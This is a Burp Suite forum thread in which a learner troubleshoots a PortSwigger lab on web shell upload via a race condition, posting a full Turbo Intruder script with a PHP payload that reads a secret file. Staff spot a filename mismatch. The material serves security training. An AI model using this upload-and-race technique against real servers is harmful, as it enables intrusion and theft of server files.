Burp Suite User Forum

Lab: Web shell upload via race condition

Dario | Last updated: Sep 04, 2023 12:06PM UTC

I cannot solve the lab in any way: I tried with Turbo Intruder applying the solution, but the result is that the GETs never return status 200. I have only tried with Intruder, with the same result. I also tried using "Send group in separate connection". I see on YouTube that so many people applying these methods have succeeded; I can't figure out where I am wrong.

Michelle, PortSwigger Agent | Last updated: Sep 04, 2023 01:15PM UTC

Hi, I've just checked the lab and was able to solve it using Turbo Intruder and the script suggested in step 7. Some of the results in the Turbo Intruder attack had a 200 response. I'd suggest checking that the correct POST and GET requests are being sent by the Turbo Intruder script and checking for any small issues.

Dario | Last updated: Sep 04, 2023 01:26PM UTC

I can paste you the script as I send it. I don't see any errors, looking at both PortSwigger's solution and copying exactly from other online walkthroughs:
_____________________________________________________________________________________________
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=10,)

    request1 = '''POST /my-account/avatar HTTP/2
Host: 0a9300d80380452c80868a36004000c7.web-security-academy.net
Cookie: session=vFdgyIhkE1ahmh7fFrez9VL85tBEC4PE
Content-Length: 480
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="116", "Not)A;Brand";v="24", "Google Chrome";v="116"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Origin: https://0a9300d80380452c80868a36004000c7.web-security-academy.net
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryhwGKghXI1CXAanvE
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a9300d80380452c80868a36004000c7.web-security-academy.net/my-account?id=wiener
Accept-Encoding: gzip, deflate
Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

------WebKitFormBoundaryhwGKghXI1CXAanvE
Content-Disposition: form-data; name="avatar"; filename="exploit.php.png"
Content-Type: application/octet-stream

<?php echo file_get_contents('/home/carlos/secret'); ?>
------WebKitFormBoundaryhwGKghXI1CXAanvE
Content-Disposition: form-data; name="user"

wiener
------WebKitFormBoundaryhwGKghXI1CXAanvE
Content-Disposition: form-data; name="csrf"

Ak5ToAZyVHlg5DhPd8luqMKRk5wVMRWM
------WebKitFormBoundaryhwGKghXI1CXAanvE--
'''

    request2 = '''GET /files/avatars/exploit.php HTTP/2
Host: 0a9300d80380452c80868a36004000c7.web-security-academy.net
Cookie: session=vFdgyIhkE1ahmh7fFrez9VL85tBEC4PE
Sec-Ch-Ua: "Chromium";v="116", "Not)A;Brand";v="24", "Google Chrome";v="116"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a9300d80380452c80868a36004000c7.web-security-academy.net/my-account/avatar
Accept-Encoding: gzip, deflate
Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7

'''

    # the 'gate' argument blocks the final byte of each request until openGate is invoked
    engine.queue(request1, gate='race1')
    for x in range(5):
        engine.queue(request2, gate='race1')

    # wait until every 'race1' tagged request is ready
    # then send the final byte of each request
    # (this method is non-blocking, just like queue)
    engine.openGate('race1')

    engine.complete(timeout=60)


def handleResponse(req, interesting):
    table.add(req)

Michelle, PortSwigger Agent | Last updated: Sep 04, 2023 01:49PM UTC

Hi, in your POST request, you seem to be uploading a file called exploit.php.png, but in the GET request, you are trying to get a different file, exploit.php. Can you update so they are referencing the same file and let me know if this helps?

Dario | Last updated: Sep 04, 2023 03:44PM UTC

OK, I got everything now :( Thanks a lot!